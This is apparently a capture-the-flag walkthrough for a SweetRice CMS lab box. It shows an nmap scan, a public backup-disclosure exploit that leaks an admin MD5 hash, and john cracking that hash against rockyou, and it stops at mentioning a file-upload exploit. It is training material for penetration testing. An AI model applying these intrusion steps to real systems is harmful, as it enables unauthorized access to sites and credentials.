# Nmap 7.91 scan initiated Mon Mar 22 17:29:52 2021 as: nmap -sSVC -p- -oA nmap_full 10.10.206.27 Nmap scan report for 10.10.206.27 Host is up (0.035s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA) | 256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA) |_ 256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon Mar 22 17:34:28 2021 -- 1 IP address (1 host up) scanned in 275.92 seconds
EDB-ID-40718 is showing an easy to exploit backup disclosure.
We can directly download /content/inc/mysql_backup/mysql_bakup_20191129023059-1.5.1.sql.
We can find an INSERT statement containing a serialized PHP object.
1
INSERTINTO `%--%_options` VALUES(\'1\',\'global_setting\',\'a:17:{s:4:\\"name\\";s:25:\\"Lazy Admin's Website\\";s:6:\\"author\\";s:10:\\"Lazy Admin\\";s:5:\\"title\\";s:0:\\"\\";s:8:\\"keywords\\";s:8:\\"Keywords\\";s:11:\\"description\\";s:11:\\"Description\\";s:5:\\"admin\\";s:7:\\"manager\\";s:6:\\"passwd\\";s:32:\\"42f749ade7f9e195bf475f37a44cafcb\\";s:5:\\"close\\";i:1;s:9:\\"close_tip\\";s:454:\\"<p>Welcome to SweetRice - Thank your for install SweetRice as your website management system.</p><h1>This site is building now , please come late.</h1><p>If you are the webmaster,please go to Dashboard -> General -> Website setting </p><p>and uncheck the checkbox \\"Site close\\" to open your website.</p><p>More help at <a href=\\"http://www.basic-cms.org/docs/5-things-need-to-be-done-when-SweetRice-installed/\\">Tip for Basic CMS SweetRice installed</a></p>\\";s:5:\\"cache\\";i:0;s:13:\\"cache_expired\\";i:0;s:10:\\"user_track\\";i:0;s:11:\\"url_rewrite\\";i:0;s:4:\\"logo\\";s:0:\\"\\";s:5:\\"theme\\";s:0:\\"\\";s:4:\\"lang\\";s:9:\\"en-us.php\\";s:11:\\"admin_email\\";N;}\',\'1575023409\');
Inside the configuration we can find the admin account manager / 42f749ade7f9e195bf475f37a44cafcb (hash).
With haiti we can find that the hash is probably MD5.
Let's hope it's not salted.
$ john hash.txt -w=/usr/share/wordlists/passwords/rockyou.txt --format=raw-md5 Using default input encoding: UTF-8 Loaded 1 password hash (Raw-MD5 [MD5 128/128 AVX 4x3]) Warning: no OpenMP support for this hash type, consider --fork=8 Press 'q' or Ctrl-C to abort, almost any other key for status Password123 (manager) 1g 0:00:00:00 DONE (2021-04-01 09:45) 100.0g/s 3360Kp/s 3360Kc/s 3360KC/s classof2011..181187 Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably Session completed
By looking again at the source code Guthub repository we can see that the code
is stored in as folder. So on the website we need to browse to /content/as/
and are facing a login page.
We can use the authenticated file upload exploit. I modified it because the original exploit
was awful.